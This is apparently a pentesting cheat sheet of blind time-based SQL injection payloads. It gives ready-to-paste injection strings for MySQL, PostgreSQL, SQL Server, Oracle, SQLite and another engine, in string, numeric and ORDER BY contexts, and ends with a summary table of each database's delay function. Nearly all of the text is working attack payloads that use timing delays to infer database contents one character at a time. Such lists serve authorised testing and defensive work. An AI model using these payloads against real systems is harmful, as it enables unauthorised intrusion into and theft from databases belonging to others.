Blind Time Based Payloads

MySQL

String context:

' AND IF(SUBSTRING(@@version,1,1)='5', SLEEP(5), 0)-- -

Numeric context:

1 AND IF(SUBSTRING(@@version,1,1)='5', SLEEP(5), 0)

Alternative (for older versions):

1 AND CASE WHEN (SUBSTRING(@@version,1,1)='5') THEN SLEEP(5) ELSE 0 END

String context

' AND (SELECT CASE WHEN SUBSTRING(version(),1,1)='1' THEN pg_sleep(5) ELSE NULL END)-- -

Numeric context:

1 AND (SELECT CASE WHEN SUBSTRING(version(),1,1)='1' THEN pg_sleep(5) ELSE NULL END)

ORDER BY CLAUSULE

Identify

ORDER BY (SELECT NULL FROM pg_sleep(5))

Exploit Identify

ORDER BY (SELECT CASE WHEN 1=1 THEN (SELECT NULL FROM pg_sleep(5)) ELSE '' END);

Exploit

ORDER BY (SELECT CASE WHEN SUBSTRING(version(),1,1)='P' THEN (SELECT NULL FROM pg_sleep(5)) ELSE '' END);

String context:

' IF (SUBSTRING(@@version,1,1) = '1') WAITFOR DELAY '0:0:5'-- -

Numeric context:

1 IF (SUBSTRING(@@version,1,1) = '1') WAITFOR DELAY '0:0:5'

String context:

' AND (CASE WHEN (SUBSTR(BANNER,1,1)='O') THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM v$version WHERE ROWNUM=1)-- -

Numeric context

1 AND (SELECT CASE WHEN SUBSTR(BANNER,1,1)='O' THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM v$version WHERE ROWNUM=1)

SQLite has no built-in sleep function, but we can use a heavy operation to induce delay.

' AND (SELECT CASE WHEN (substr(sqlite_version(),1,1)='3') THEN randomblob(1000000000) ELSE NULL END)-- -

String context:

' AND (CASE WHEN (SUBSTRING(DATABASE(),1,1)='t') THEN SCRIPT_SLEEP(5000) ELSE 0 END)=0-- -

Numeric context:

1 AND (CASE WHEN (SUBSTRING(DATABASE(),1,1)='t') THEN SCRIPT_SLEEP(5000) ELSE 0 END)=0

DBMS

Time Function

Sample Payload (String Context)

MySQL

SLEEP(seconds)

' AND IF(1=1,SLEEP(5),0)-- -

PostgreSQL

pg_sleep(seconds)

' AND (SELECT CASE WHEN 1=1 THEN pg_sleep(5) ELSE NULL END)-- -

SQL Server

WAITFOR DELAY '0:0:5'

' IF (1=1) WAITFOR DELAY '0:0:5'-- -

Oracle

DBMS_LOCK.SLEEP(5)

' AND (SELECT CASE WHEN 1=1 THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual)-- -

SQLite

No sleep (hacky)

' AND (SELECT CASE WHEN 1=1 THEN randomblob(1000000000) ELSE NULL END)-- -

Last updated 3 months ago